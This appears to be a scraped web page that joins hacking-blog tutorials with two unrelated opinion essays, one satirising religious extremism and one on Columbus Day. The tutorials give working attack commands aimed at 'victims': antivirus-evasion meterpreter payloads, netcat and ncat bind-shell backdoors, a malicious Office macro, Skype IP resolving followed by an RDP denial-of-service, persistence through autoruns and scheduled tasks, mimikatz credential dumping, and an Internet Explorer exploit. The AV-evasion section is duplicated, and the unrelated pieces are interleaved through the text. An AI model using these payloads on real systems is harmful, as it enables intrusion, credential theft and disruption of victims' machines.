ROOM ZKE
Translation Page | USAComment.com
USAComment.com
Zicutake USA Comment | Search Articles



#History (Education) #Satellite report #Arkansas #Tech #Poker #Language and Life #Critics Cinema #Scientific #Hollywood #Future #Conspiracy #Curiosity #Washington
 Smiley face
PROXY LIST
 Smiley face
Zicutake BROWSER
 Smiley face Encryption Text and HTML  Smiley face Conversion to JavaScript 
 Smiley face Mining Satoshi | Payment speed 
 Smiley face
CREATE ADDRESS BITCOIN
Online BitTorrent Magnet Link Generator
JOURNAL WORLD:

SEARCH +8 MILLIONS OF LINKS ZICUTAKE STATE

List of Differnet AV evasion Frameworks.

Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.

(1)Veil:-


Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.

Click here for how to install & use Veil?

(2)AV0id :-


Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh

Antivirus Evasion


If you are using other interface than eth , then you have to change in script avoid.sh . For exmaple ; i am using ppp0 interface ,so open avoid.sh file & replace line 150 which is IP=$(ifconfig "$IPINT" |grep "inet adr:" |cut -d ":" -f 2 |awk '{ print $1 }') with IP=$(ifconfig ppp0 | awk '/inet addr/ {split ($2,A,":"); print A[2]}').

AV-Reports-For-payload


Click here for original author`s blog.

(3)Syringe:-


wget https://syringe-antivirus-bypass.googlecode.com/files/syringe%200.1.tar
tar xf syringe\ 0.1.tar
./syringe.sh

Antivirus-Evasion-Using-Syringe

As mention previously , change interface type in script if you are not using eth. Replace line 10 which is export interface=eth0 to export interface=ppp0.

AV-Reports-For-syringe-payload 

(4)Shellcodeexec:-


git clone https://github.com/inquisb/shellcodeexec

we are gonna use downloaded shellcodexec in third step on victim machine.

(1)msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

(2)msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 E

(3)C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>

shellcodeexex-AV-report

Click here for detail tutorial on  how to use shellcodeexec?

(5)Hypersion:-


Hyperion is a runtime encrypter for 32-bit portable executables.

wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe

Now generate metasploit payload.

hyperion-payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
wine crypter.exe payload.exe encrypted_payload.exe

AV-report-for-hyperion-payload 

(6)Crypter.py:-


Download it from below link .
http://home.base.be/%72%68%69%6e%63%6b%78%74/script.zip
unzip  script.zip
python crypter.py

crypter.py

If you get error while running then change path of structure.c in line 45 & save it , run again.

AV-report-for-crypter.py-payload

(7)Brute-force AV Evasion :-


Genpayloads.py is script to generate lots of payloads , then scan folder for specific after that you have some binary left in folder which does not detected by specific AV.

Click here for Original tutorial

wget https://raw.github.com/obscuresec/random/master/GenPayloads.py
python GenPayloads.py windows/meterpreter/reverse_tcp 192.168.1.2 443 1000 yes

(8)Finding Simple AV Signatures with PowerShell :-


Awesome tutorial here to find AV signatures & then change specific bit which trigger AV . It only works with signature-based antivirus .

(9)Powershell:-


Bypass AV using SET powershell module using Batch file

Get shell using powersploit

Deliver powershell payload using macro

(10)Get Shell Using VB script:-


Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well.

For details tutorial click here

(11)Ghost Writing ASM :-


Using Metasm To Avoid Antivirus Detection. First generate metasploit payload in raw format then disassmble using metasm which come with metasploit.Add anything you want so long as you don’t break the functionality of the application.After that compile into EXE.

For tutorial click here .

(12)Different Pivoting technique to bypass AV :-


Following are framework & module which are mostly used after getting credentials. It does not flag by AV like traditional psexec.

(1)Veil-Catapult

(2)SMBExec

(3)Keimpx

(4)PTH suite

(5)Metasploit module:- powershell_psexec , psexec_psh , psexec_command

If you know other methods for AV evasion then please comment here.

List of Differnet AV evasion Frameworks.

Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.

(1)Veil:-


Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.

Click here for how to install & use Veil?

(2)AV0id :-


Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh

Antivirus Evasion


If you are using other interface than eth , then you have to change in script avoid.sh . For exmaple ; i am using ppp0 interface ,so open avoid.sh file & replace line 150 which is IP=$(ifconfig "$IPINT" |grep "inet adr:" |cut -d ":" -f 2 |awk '{ print $1 }') with IP=$(ifconfig ppp0 | awk '/inet addr/ {split ($2,A,":"); print A[2]}').

AV-Reports-For-payload


Click here for original author`s blog.

(3)Syringe:-


wget https://syringe-antivirus-bypass.googlecode.com/files/syringe%200.1.tar
tar xf syringe\ 0.1.tar
./syringe.sh

Antivirus-Evasion-Using-Syringe

As mention previously , change interface type in script if you are not using eth. Replace line 10 which is export interface=eth0 to export interface=ppp0.

AV-Reports-For-syringe-payload 

(4)Shellcodeexec:-


git clone https://github.com/inquisb/shellcodeexec

we are gonna use downloaded shellcodexec in third step on victim machine.

(1)msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

(2)msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 E

(3)C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>

shellcodeexex-AV-report

Click here for detail tutorial on  how to use shellcodeexec?

(5)Hypersion:-


Hyperion is a runtime encrypter for 32-bit portable executables.

wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe

Now generate metasploit payload.

hyperion-payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
wine crypter.exe payload.exe encrypted_payload.exe

AV-report-for-hyperion-payload 

(6)Crypter.py:-


Download it from below link .
http://home.base.be/%72%68%69%6e%63%6b%78%74/script.zip
unzip  script.zip
python crypter.py

crypter.py

If you get error while running then change path of structure.c in line 45 & save it , run again.

AV-report-for-crypter.py-payload

(7)Brute-force AV Evasion :-


Genpayloads.py is script to generate lots of payloads , then scan folder for specific after that you have some binary left in folder which does not detected by specific AV.

Click here for Original tutorial

wget https://raw.github.com/obscuresec/random/master/GenPayloads.py
python GenPayloads.py windows/meterpreter/reverse_tcp 192.168.1.2 443 1000 yes

(8)Finding Simple AV Signatures with PowerShell :-


Awesome tutorial here to find AV signatures & then change specific bit which trigger AV . It only works with signature-based antivirus .

(9)Powershell:-


Bypass AV using SET powershell module using Batch file

Get shell using powersploit

Deliver powershell payload using macro

(10)Get Shell Using VB script:-


Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well.

For details tutorial click here

(11)Ghost Writing ASM :-


Using Metasm To Avoid Antivirus Detection. First generate metasploit payload in raw format then disassmble using metasm which come with metasploit.Add anything you want so long as you don�t break the functionality of the application.After that compile into EXE.

For tutorial click here .

(12)Different Pivoting technique to bypass AV :-


Following are framework & module which are mostly used after getting credentials. It does not flag by AV like traditional psexec.

(1)Veil-Catapult

(2)SMBExec

(3)Keimpx

(4)PTH suite

(5)Metasploit module:- powershell_psexec , psexec_psh , psexec_command

If you know other methods for AV evasion then please comment here.

Backdoor using Netcat, cryptcat , ncat.

Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command.

netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Attacker `s I.P : 192.168.56.1

Victim`s I.P.     : 192.168.56.101

We will talk about Netcat, cryptcat & ncat.

(A)Netcat:-


Netcat is used as backdoor. After gaining access to machine , we are creating "netcat" as startup service using changes to the system registry . And then we are gonna open port for communication. At attacker side just start  netcat listener. Here is tutorial on how to create netcat backdoor?

But if you know about method used in that tutorial ; there are some disadvantages of using netcat.

(1)Most of AV flag netcat as hacking tool :- I know You can use crypter , but still general behavior detection  possible by AV.

netcat-virustotal


(2)Clear text communication (No encryption):-anyone from same network can view your communication.Also due to clear text communication firewall or AV can popup & block our communication.

netcat-capture-traffic-using-wireshark

(3)No authentication:- anyone can start listner to connect back to our backdoor , because there is no mechanism to verify that user are authorized or not.


(B)Cryptcat:-


Cryptcat is same as netcat but in advanced it provide encryption & authentication mechanism.

How to install cryptcat?


In case of backtrack , apt-get install cryptcat .

If you are in other linux OS , then you have to manually installed it from source ; because in repository it does not come with e option , so we can not bind any program to it.

So download source from here .

unzip it , change directory & enter following command

make unix

To make exe(windows compatible) from source , use visual studio.

root@bt:~# cryptcat -h
[v1.10]
connect to somewhere:    nc [-options] hostname port[s] [ports] ...
listen for inbound:            nc -l -p port [-options] [hostname] [port]
options:
    -e prog            program to exec after connect [dangerous!!]
    -g gateway      source-routing hop point[s], up to 8
    -G num            source-routing pointer: 4, 8, 12, ...
    -h                     this cruft
    -k secret          set the shared secret
    -i secs              delay interval for lines sent, ports scanned
    -l                      listen mode, for inbound connects
    -n                     numeric-only IP addresses, no DNS
    -o file               hex dump of traffic
    -p port             local port number
    -r                     randomize local and remote ports
    -s addr             local source address
    -u                     UDP mode
    -v                     verbose [use twice to be more verbose]
    -w secs            timeout for connects and final net reads
    -z                     zero-I/O mode [used for scanning]

Most of options are same as netcat, but look at new option as -k , it provide password for communication.

On victim machine type following command

cryptcat -Ldp 455 -e cmd.exe

On attacker side , setup listner

cryptcat 192.168.56.101 455

backdoor-using-cryptcat

Look at following figure ; where we capture traffic using wireshark ; it`s encrypted.

cryptcat-capture-traffic

You can also provide -k option for authentication.So in case of cryptcat we got authentication & encryption.

But still it detected by AV.

cryptcat virustotal
                                            Virustotal link

(3)Ncat:-


Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat.Ncat  come with nmap , so in attacker side we have already installed ncat. 

To download ncat for windwos click here.

View man page of ncat or ncat --help ; it has so many option.

For encryption & authentication you can use ssl ,ssl cert, ssl key ,ssl verify.

on victim side:-

ncat -lvp 455 --ssl -e cmd.exe --allow 192.168.56.1

I encrypt communication using ssl & only allow 192.168.56.1 ip to connect back.It`s possible to connect back using spoofing I.P.

on attacker side

ncat 192.168.56.101 445 --ssl

ncat-backdoor

And it does not detected by AV.


cryptcat virustotal


So with help of ncat , we can get around of our problems which are no-authentication, no-encryption, caught by AV.

Give Piss-Taking A Chance



It’s 45 years since John and Yoko suggested that we “Give Peace a Chance”. A laudable suggestion and a very handy sound bite for the budding Beauty Queen.

For many however such commendable desires for world peace are often tempered with their own indoctrinated ideologies. Many falsely believe the path to peace and harmony lies exclusively within their own particular faith. Increasingly we seem to be witnessing examples where those ideologies appear to be so entrenched and perverted that those captivated under their spell abandon reason and humanity in violent and bloody pursuit of their own deluded notions of Nirvana.

Imagine if John was still with us today, it’s easy if you try. The rolling news coverage on any given day may well lead him to conclude that his admirable 1968 proposal is not going as well as he had hoped. We tried staying in bed. We tried painting our naked bodies in psychedelic patterns and flouncing around to Jefferson Airplane whilst shoving flowers down the barrels of rifles, but it didn’t really work. More recently we tried retaliating against terror with well financed “Shock and Awe”. But that didn't seem to work out too well either.

Now what?  Are we all out of ideas? Do we just cower behind our enhanced airport security and knee jerk anti-terrorism policies and wait for it to go away? Do we redefine our goals for peace to be a little more localised?

I think not. I think we’ve just been retaliating with the wrong weapons. I propose a fresh assault on terror. Not with guns and bombs but with satire, sarcasm and ridicule.

Let’s rip their ideology apart with cutting satirical warfare; let’s rain down cogent and piercing ridicule on their fragile dogmas. Let us unleash the weapons of mass derision. Put down your swords, pick up your pens and let’s make the fundamentalists of all faiths into morons rather than martyrs. And let’s indiscriminately deploy the same sardonic sortie on our own more familiar ideological claptrap.


NB: Extracting urine from deeply held yet completely ridiculous ideologies does not contravene your diversity training

Get shell Using Shellcode in Macro.

We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.

msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit


Now we have generated our shellcode. Now we will create macro.

(1)Open any word or Excell document

(2)Click on view & then click on Macros.

(3)Give name to macro & create macro.


(4)Remove all things from modules windows & Paste our generated VB code.



(5)Saved it as type Word Macro-Enabled Document.


Send this file to victim. By default in MS Office  " Disable all macros with notification " option is enabled , so whenever any document try to execute Macro it will pop up security warning that macro is disable ; so to execute our shellcode using macro victim should click on Enable content.

You have to setup listener to listen reverse connection. If your IP is not available when victim open Document then document will be crash.So now we will setup listener

use exploit/multi/handler
set lhost 192.168.56.102
set lport 443
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe
exploit

Here we setup migrate script as autorunscript so when document will closed our shell will not die.

How to detect Avast Antivirus remotely?

During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?

Original video is posted here. In avast their is feature of site blocking ; so if you want to block any site you can put its address in block url section of avast interface.when someone load that site they get response as shown in below image.

How-to-detect-Avast-Antivirus-remotely

In above image you can see that avast logo which address is localhost:12080/$$avast-webshield$$/image001.png . So if in client machine avast is installed than that image is also located at that address , by examine image is exist or not we can know that whether avast is installed or not.

For this purpose victim should visit  our link where we can check about image.So i am gonna use my apache server ; where i put three html page. One is our link which we gonna send to victim ; if image exist it redirect to other document ; & if image does not exist it redirect to third html page.

(1)Make blank html page & give it to name avst.html & put following code in that html page.

<meta http-equiv="refresh" content="0; url=http://google.com/">

(2)Now make second html page & give it to name ntavst.html & put same code in that page.

<meta http-equiv="refresh" content="0; url=http://google.com/">

(3)Make third & final html page and give it to name exp.html & put following code.

<div dir="ltr" style="text-align: left;" trbidi="on">

<img src="http://127.0.0.1:12080/$$avast-webshield$$"/image001.png" onload="document.location='http://180.215.198.150/avast.html'" onerror="document.location='http://180.215.198.150/ntavast.html'" />

Note:- Change your i.p in above code.

Now put these all document in /var/www/ folder.And send link of exp.html to victim

So if avast installed then it redirect to avast.html page & finally redirect to google.com & if it does not installed then it will redirect to ntavst.html page & then redirect to google.com

Now check your apache log file from \var\log\apache2\log ; you can check if avst.html page has been visited or ntavst.html page.

How-to-detect-Avast-Antivirus-remotely
PS: You can use cobalt strike `s system profiler which get you os version;  browser detail; java version ; adobe reader  version & flash version.

Taking the Chris out of Columbus Day

Jonathan Twingley/The Los Angeles Times
Perhaps I am naive, but I assume that serious debates about the merits of Columbus Day have been settled.

I hear no firsthand defenses of the holiday.  I hear no one seriously defend him as a person or praise his "discovery" of the Americas as anything other than a kind of accident that was fortunate for him and unfortunate for millions of others.  So I do not give him or his holiday much attention.

But then, since I teach American Indian literatures at a university, I am not surrounded by people prone to defend him. On my campus, people are more likely to talk about the door he opened for the importation of commercialized slavery, apocalyptic diseases, and conquistadors than about anything positive he may have been credited for in the past.

The Los Angeles Times, though, ran a defense of sorts for the holiday in Sunday's edition. The op-ed  piece by an emeritus professor from UCLA, "Curiosity set sail with Columbus," attempts to credit his journey with "prying loose European curiosity from the vise put in place by the medieval church."

The claim strikes me as ironic since so much of the ensuing colonization of the Americas was enabled and empowered by the Catholic Church, including the enslavement of Indians.

Although the article mentions the "unintentional holocaust" caused by diseases that crossed the ocean with the Europeans, it does not mention the intentional holocausts of mass slavery, imperialism, and genocidal warfare.

In fact, the newspaper itself may have been a little ambivalent about the retired professor's opinion. The op-ed is accompanied by an illustration that conveys a message (intentional or not) that undermines the words.

Granted, the image shows Columbus on top of the world and a generic church figure on the bottom; this suggests that he has perhaps upended some balance of power in the world.  But Columbus has a really creepy hand holding his stomach; it looks rather skeletal.  And his face is strangely obscured along his jaw and neck, with odd markings in the air by his face and shoulder -- are they insects?  I do not know what the artist intended, but to me Columbus looks a bit like the Lord of the Flies.

Rather than representing the Light of Knowledge, he looks like the Specter of Death. The op-ed suggest he was some kind of vanguard of the Enlightenment, but the illustration suggests he was harbinger of Doom.

The church official below him looks somewhat skeletal himself, and his red robe suggests something hellish as much as holy.  Rather than looking like opposites, the two figures look like partners in crime.

I have no problem if the retired UCLA professor wants a new holiday to celebrate Europe's emergence from some intellectual black hole.  Let's just not call it Columbus Day.

Fun with skype resolver

Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.

If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P.

netstat -tupan | grep skype > n1

Now chat with your victim; as soon as you got reply use following command.

netstat -tupan | grep skype > n2

diff n1 n2

Now we have I.P. of victim.

In most situation our victim is not in our friend-list. So for that situation, we will going to use online skype resolver.You can also use bash script for getting ip of victim which i wrote.

root@bt:~# git clone https://github.com/niravkdesai/skypersolver.sh

root@bt:~# cd skypersolver.sh/

root@bt:~/skypersolver.sh# sh skypersolver.sh


Use one of following  links to get I.P. of your victim using his skype user-name.

(1)http://www.skyperesolver.com/

(2)http://skresolver.com/

(3)http://www.speedresolve.com/resolve.php

(4)http://skypegrab.com/skype-beta

(5)http://iskyperesolve.com/

Okay we got I.P. Now you can directly DOS or DDOS( ddos and dos attacks are illegal) them . But we are going to use different technique to shutdown your victim pc using RDP.

First scan ip to find open ports of victim.

root@bt:~# nmap 192.168.56.101

Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-11 18:41 IST
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 995 filtered ports
PORT      STATE  SERVICE
139/tcp     open   netbios-ssn
445/tcp     open   microsoft-ds
2869/tcp   closed icslap
3389/tcp   open   ms-wbt-server
10243/tcp closed unknown
MAC Address: 08:00:27:B3:A3:80 (Cadmus Computer Systems)

nmap-scan

From result we can see that port 3389 is open which is used for RDP.

Now we will use metasploit Auxiliary module to check vulnerability.

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(ms12_020_check) > run

[+] 192.168.56.101:3389 Vulnerable to MS12-020
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

check-for-vulnerability

Okay we got that host is vulnerable to MS12-020.Now we will use metasploit module to Dos that I.p.

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.56.101:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.56.101:3389 - 210 bytes sent
[*] 192.168.56.101:3389 - Checking RDP status...
[+] 192.168.56.101:3389 seems down
[*] Auxiliary module execution completed

exploit-RDP

And bingo ; your victim machine should be restarted. :)

Get shell using Missing Autoruns.

In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.

(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will run in background.When uninstallation of program is not completed ; then it fails to remove its value from registry. So it`s called Missing Autoruns.

After compromised pc ; we have to find missing autoruns in victim machine.For this purpose we will use sysinternal `s autorunsc.exe.

(1)Get meterpreter shell.

(2)Upload sysinternal`s autoruns.exe & autorun.exe to victim machine.

(3)Now from uploaded directory execute following command to get missing autoruns of machine

autorunsc.exe -a | findstr /n /R "File\ not\ found"

(4)Now we have list of file which is missing ; these files are run at startup time.

missing-autoruns


(5)In my case you can see that uTorrent.exe is missing .

(6)So now i rename my backdoor to uTorrent .exe & uploaded to the path where it`s not found.

upload-backdoor

Now whenever machine is restarted you get shell.(Don`t forget to running multi/handler!!!)

For just POC ; you can run autorunsc.exe again to find out whether  our backdoor (uTorrent.exe) is written successfully or not?

missing -autorun-backdoor

In above image you can see that  uTorrent.exe is no longer missing which missed in previous step.

(B)Now this is second method; but may be suspicious.

When you put binary in start up folder it will run automatically when pc is started.

Startup Folder Location in windows Xp:-

C:\Documents and Settings\"nirav"\Start Menu\Programs\Startup

Startup Folder location In windows 7:-

C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

So upload your binary to start up folder ;make it hidden using following command.
attrb +h backdoor.exe
Restart machine & Hopefully you will get shell.

Schedule Task in windows after Exploitation.

Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here.

After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.

First create one batch file , put following code in it

@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"


Then upload your backdoor & created batch file.Please adjust path of batch file according to your upload path of backdoor.

Get clear text password:-

Following are different methods to get clear text password of windows.

(1)using mimikatz or wce get clear text password of victim.

(2) You can also use mimikatz password dump method .

(3)You can also use mimikatz meterpreter plugin which i used in this tutorial.

   meterpreter > load mimikatz
   meterpreter > help mimikatz
   meterpreter > kerberos
   meterpreter > mimikatz_command -h
   meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

(4)You can use wce & mimikatz in memory without uploading binary.

(a)WCE in memory:-

cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt

(b)Mimikatz in memory:-

cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

get-clear-text-password
So till now i upload one batch file ; backdoor & get clear text password.

Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit here . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed & i will get shell.

C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00

It will ask to enter password which we got before.

schedule-task

You can also use different option like ONIDLE, ONLOGON, and ONSTART & execute different binary according to your need.

Exploit For All IE version(CVE-2013-3893).

Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded here.

This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well.

For more technical Detail view metasploit blog here

The Metasploit module currently can be only tested on Internet Explorer 9 on Windows 7 SP1 with either Office 2007 or Office 2010 installed,


msf > use exploit/windows/browser/ie_setmousecapture_uaf
msf exploit(ie_setmousecapture_uaf) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set uripath /
uripath => /
msf exploit(ie_setmousecapture_uaf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_setmousecapture_uaf) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set lport 443
lport => 443
msf exploit(ie_setmousecapture_uaf) > run
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.1:443
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.


Send this link to victim. As soon as he open link you will get meterpreter shell.

exploit-for-CVE-2013-3893